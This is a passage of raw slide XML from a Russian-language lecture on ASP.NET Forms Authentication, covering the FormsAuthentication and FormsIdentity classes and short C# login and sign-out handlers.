              <a:rPr lang="ru-RU" sz="4000" b="1" smtClean="0"/>
              <a:t>Прикладной программный интерфейс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Forms Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="3162300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Common approach for performing application-level authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Application manages storage of credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Application handles authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>FormsAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Credential Management and storage</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sz="3200" smtClean="0"/>
              <a:t>Основные классы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Forms Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>FormsAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– основной класс для работы со инфраструктурой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>forms authentication. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Предоставляет базовую информацию о конфигурации и позволяет создать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ticket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>установить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>cookie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>и выполнит перенаправление с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>к запрашиваемой страпнице, если проверка учетных данных закончилась успешно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>FormsIdentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– реализация интерфейса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IIdentity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>forms authentication. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Основной особенностью является свойство </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Ticket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>которое возвращает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>forms authentication ticket. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Это позволяет хранить и получать дополнительную информацию о </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="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Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Класс FormsAuthentication </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Содержимое 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Статический класс с набором методов для подключения и отключения пользователя от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>приложения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Основной класс для работы со инфраструктурой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>forms authentication. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Предоставляет базовую информацию о конфигурации и позволяет создать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ticket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>установить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>cookie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>и выполнит перенаправление с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>к запрашиваемой страпнице, если проверка учетных данных закончилась успешно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="240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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Создание страницы подключения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="1468438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="3789363"/>
            <a:ext cx="6048375" cy="2720975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Обработка подключения пользователя</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Обработка события </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>для кнопки на форме подключения:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>protected void LoginAction_Click(object sender, EventArgs e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  Page.Validate();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  if (!Page.IsValid) return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  if (FormsAuthentication.Authenticate(UsernameText.Text, PasswordText.Text)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>    // Create the ticket, add the cookie to the response,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>    // and redirect to the originally requested page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>    FormsAuthentication.RedirectFromLoginPage(UsernameText.Text, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  // User name and password are not correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>     LegendStatus.Text = "Invalid username or password!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Методы класса FormsAuthentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="1600200"/>
            <a:ext cx="8929687" cy="5068888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>UsernameText.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>PasswordText.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Подключает пользователя к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>приложениию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> и возвращает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>если пользователь прошел аутентификацию, иначе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>false.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>RedirectFromLoginPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>UsernameText.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Выполняет следующие действия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Создает для пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> authentication ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Шифрует информацию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>authentication ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Создает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> для хранения шифрованной информации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Добавляет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP response, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>для отправки его пользователю</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Перенаправляет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> пользователя на запрашиваемую страницу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>которая содержится в параметре строки запроса при переходе к странице подключения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SignOut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> выполняет отключение от приложения</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>RedirectToLoginPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t> выполняет переход к странице с подключением.</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smtClean="0"/>
              <a:t>Отключение пользователя</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>protected void SignOutAction_Click(object sender, EventArgs e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>	FormsAuthentication.SignOut();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>	FormsAuthentication.RedirectToLoginPage();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>}</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sz="4000" smtClean="0"/>
              <a:t>Контекст безопасности </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>(Security Context)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
